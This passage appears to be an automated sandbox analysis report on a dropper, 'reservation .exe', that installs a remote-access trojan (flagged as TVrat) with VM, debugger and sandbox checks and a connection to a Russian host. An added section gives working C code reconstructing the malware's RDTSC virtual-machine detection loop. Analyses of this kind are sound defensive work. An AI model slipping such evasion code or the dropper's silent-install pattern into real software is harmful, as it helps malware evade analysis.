                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:' (this identical query is logged 176 times)
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe Section loaded: OutputDebugStringW count: 1844
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe RDTSC instruction interceptor: First address: 69B27E second address: 69B284 instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe RDTSC instruction interceptor: First address: 69B284 second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F99D0E0B076h 0x00000006 sub eax, ebx 0x00000008 mov dword ptr [ebp-04h], eax 0x0000000b mov ecx, 0000000Ah 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe RDTSC instruction interceptor: First address: 69B294 second address: 69B29A instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe RDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F99D0E0B076h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F99D0E0B085h 0x0000000d dec ecx 0x0000000e jne 00007F99D0E0B069h 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe RDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F99D0E0B076h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F99D0E0B085h 0x0000000d mov dword ptr [ebp-04h], eax 0x00000010 dec ecx 0x00000011 jne 00007F99D0E0B069h 0x00000013 rdtsc
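The five interceptor records above are one timing loop read out of order: two back-to-back rdtsc reads, a retry if edx (the high dword) changed between them, `sub eax, ebx` for the low-dword delta, a baseline stored at [ebp-04h], then ten more rounds (ecx = 0Ah) that keep the smallest delta (`jnle` skips the store only when the new delta is larger). A hypervisor that traps rdtsc inflates even the minimum, which is what makes the result usable as a VM check. The C below is an added reconstruction of that logic, not code from the sample or from Joe Sandbox; the comparison threshold (1000) is an assumption, since the report does not show the constant the sample tests against, and the scripted timestamp array is constructed so the loop can be exercised offline.

```c
/* Added example: reconstruction of the RDTSC minimum-delta loop seen in the
 * interceptor output. Not the sample's code. The threshold is an assumption and
 * the scripted timestamps are constructed test data. */
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

#if defined(_MSC_VER) && (defined(_M_X64) || defined(_M_IX86))
#include <intrin.h>
static uint64_t read_tsc(void) { return __rdtsc(); }          /* real rdtsc (MSVC) */
#elif defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static uint64_t read_tsc(void) { return __rdtsc(); }          /* real rdtsc (gcc/clang) */
#else
#include <time.h>
static uint64_t read_tsc(void) {                              /* non-x86 stand-in */
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

typedef uint64_t (*tsc_reader)(void);

/* Two back-to-back reads. The sample saves edx from the first read and retries
 * (jne) when the second read's edx differs, so a wrapped low dword never feeds
 * a bogus `sub eax, ebx`. */
uint32_t sample_delta(tsc_reader rd) {
    for (;;) {
        uint64_t first = rd();
        uint64_t second = rd();
        if ((uint32_t)(first >> 32) != (uint32_t)(second >> 32))
            continue;                                   /* cmp edi, edx / jne: retry */
        return (uint32_t)second - (uint32_t)first;      /* sub eax, ebx */
    }
}

/* Baseline sample into [ebp-04h], then `rounds` more (ecx = 0Ah in the sample),
 * keeping the minimum: `cmp eax,[ebp-04h]; jnle skip; mov [ebp-04h],eax`.
 * jnle is a signed compare, hence the int32_t casts. */
uint32_t min_tsc_delta(tsc_reader rd, unsigned rounds) {
    uint32_t best = sample_delta(rd);
    for (unsigned i = 0; i < rounds; i++) {
        uint32_t d = sample_delta(rd);
        if ((int32_t)d <= (int32_t)best)
            best = d;
    }
    return best;
}

/* The report does not show the constant the sample compares against; the
 * threshold is the caller's assumption. When a hypervisor traps rdtsc, even the
 * smallest of eleven samples lands in the thousands of cycles. */
int looks_virtualized(uint32_t min_delta, uint32_t threshold) {
    return min_delta > threshold;
}

/* Constructed timestamp script: pair 1 wraps the low dword (retried), pair 2 is
 * the baseline (24), pairs 3-12 are the ten rounds, with 18 as the minimum. */
static const uint64_t constructed_tsc[] = {
    0x00000000FFFFFFF0ull, 0x0000000100000005ull,   /* high dword changed: retry */
    0x0000000100000100ull, 0x0000000100000118ull,   /* 24 -> baseline */
    0x0000000100000200ull, 0x0000000100000214ull,   /* 20 */
    0x0000000100000300ull, 0x000000010000031Eull,   /* 30 */
    0x0000000100000400ull, 0x0000000100000412ull,   /* 18 -> minimum */
    0x0000000100000500ull, 0x0000000100000532ull,   /* 50 */
    0x0000000100000600ull, 0x0000000100000632ull,
    0x0000000100000700ull, 0x0000000100000732ull,
    0x0000000100000800ull, 0x0000000100000832ull,
    0x0000000100000900ull, 0x0000000100000932ull,
    0x0000000100000A00ull, 0x0000000100000A32ull,
    0x0000000100000B00ull, 0x0000000100000B32ull,
};
static size_t script_pos;
void scripted_reset(void) { script_pos = 0; }
uint64_t scripted_tsc(void) {
    size_t n = sizeof constructed_tsc / sizeof constructed_tsc[0];
    return constructed_tsc[script_pos++ % n];
}

int main(void) {
    scripted_reset();
    printf("scripted minimum delta: %u\n", min_tsc_delta(scripted_tsc, 10));
    uint32_t live = min_tsc_delta(read_tsc, 10);
    printf("live minimum delta: %u -> %s\n", live,
           looks_virtualized(live, 1000) ? "possibly virtualized" : "bare-metal-like");
    return 0;
}
```

Taking the minimum rather than the average is the detail worth noticing for detection engineering: a single context switch or interrupt cannot push the result up, so the check is stable on bare metal and only a consistently trapping hypervisor (or a sandbox that patches rdtsc to advance slowly, which then looks suspiciously uniform) changes the outcome.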
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe Window / User API: threadDelayed 1296
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_10-21028
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_iscrypt.dll
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\opus.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-PO10S.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\astrct.dll
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\libjpeg-turbo-win.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\aw_sas32.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\libjpeg-turbo-win.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_iscrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\libeay32.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\msvcr120.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-PDQGE.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-SJ8AI.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-8MMT6.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\opus.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\astclient.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-BI7PN.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\libcryptoMD.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\libcurl.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\aw_sas32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-HE32K.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\hatls.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\libcryptoMD.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\libcurl.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\astrct.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-K402A.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\hatls.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\msvcr120.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\libeay32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-RFQHO.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-BFIN6.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-OUNKJ.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-9MCCS.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\astclient.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-MGO66.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-SSL54.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-26KIS.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeFile opened: PhysicalDrive0Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeThread sleep count: Count: 1296 delay: -10Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 11_2_070641D8 lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_070641D8
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: VMware
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: VBoxService.exe
                          Source: reservation .tmp, 00000002.00000002.2048762588.000000000082D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: reservation .tmp, 00000002.00000002.2048762588.000000000082D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: VMWare
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: VBoxService.exeU
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2871829583.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: ast.exe, 0000000C.00000002.2954858422.0000000000CBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B71EFE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B71EFE1
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6FAE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,10_2_6B6FAE50
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B71C43E mov eax, dword ptr fs:[00000030h]10_2_6B71C43E
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B721C01 mov eax, dword ptr fs:[00000030h]10_2_6B721C01
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B71EFE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B71EFE1
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B70DC3A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6B70DC3A
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess created: C:\Users\user\Desktop\reservation .exe "C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giuJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\qilq\*" "C:\Users\user\AppData\Roaming\fat\"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\fat\ast.exe "C:\Users\user\AppData\Roaming\fat\ast.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeProcess created: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp "c:\users\user\appdata\local\temp\is-4sm5o.tmp\reservation .tmp" /sl5="$2046a,7120736,816128,c:\users\user\desktop\reservation .exe" /verysilent /password=84t66giu
                          Source: C:\Users\user\Desktop\reservation .exeProcess created: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp "c:\users\user\appdata\local\temp\is-4sm5o.tmp\reservation .tmp" /sl5="$2046a,7120736,816128,c:\users\user\desktop\reservation .exe" /verysilent /password=84t66giuJump to behavior
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWndSVW
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWnd
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWndTrayNotifyWndSV
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B71FBD1 GetSystemTimeAsFileTime,10_2_6B71FBD1
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: ast.exe, 0000000B.00000003.2864608852.0000000007062000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: PROCEXP.EXE

Stealing of Sensitive Information

Source: Yara match | File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6F6D50 socket,socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,curl_msnprintf,send,recv,closesocket,closesocket,closesocket,closesocket,closesocket,10_2_6B6F6D50
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6C39A0 curl_pushheader_bynum,inet_pton,htons,inet_pton,htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,10_2_6B6C39A0
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6CEEA0 ___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,inet_pton,_strncpy,___from_strstr_to_strchr,___from_strstr_to_strchr,curl_pushheader_bynum,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,curl_msnprintf,curl_easy_strerror,curl_easy_strerror,10_2_6B6CEEA0
MITRE ATT&CK Matrix (rendered navigator view; columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). The per-technique cells and their signature-count badges are not reproduced here.
Behavior Graph (ID: 1558751; sample: reservation .exe; start date: 19/11/2024; architecture: WINDOWS; score: 84)

Top-level signatures: Icon mismatch, binary includes an icon from a different legit application in order to fool users; Yara detected TVrat; Sigma detected: Suspicious Double Extension File Execution; Uses an obfuscated file name to hide its real file extension (a lot of spaces)

Process tree (from the graph):
- reservation .exe (started; drops reservation .tmp, PE32)
  - reservation .tmp (started; drops C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ and C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32)
    - reservation .exe (started; drops reservation .tmp, PE32)
      - reservation .tmp (started; drops C:\Users\user\AppData\...\quartz.dll (copy), PE32; C:\Users\user\AppData\...\opus.dll (copy), PE32; C:\Users\user\...\libssl-1_1.dll (copy), PE32; 29 other files (24 malicious))
        - cmd.exe (started)
          - xcopy.exe (started; drops C:\Users\user\AppData\Roaming\...\quartz.dll, PE32; C:\Users\user\AppData\Roaming\fat\opus.dll, PE32; C:\Users\user\AppData\...\libssl-1_1.dll, PE32; 12 other files (11 malicious))
          - ast.exe (started; network: id.xn--80akicokc0aablc.xn--p1ai 212.193.169.65, 443, 44335, 49979, SAFIB-ASRU Russian Federation; 127.0.0.1 unknown unknown; signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to delay execution (extensive OutputDebugStringW loop); Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes); Tries to detect virtualization through RDTSC time measurements)
          - conhost.exe (started)
- ast.exe (started; second top-level instance)
- ast.exe (started; third top-level instance)

Source | Detection | Scanner | Label | Link
reservation .exe | 8% | ReversingLabs

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\AstCrp.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\ast.exe (copy) | 12% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\astclient.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\astrct.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\aw_sas32.dll (copy) | 4% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\hatls.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-26KIS.tmp | 4% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp | 12% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-8MMT6.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-9MCCS.tmp | 4% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-BFIN6.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-BI7PN.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-HE32K.tmp | 0% | ReversingLabs
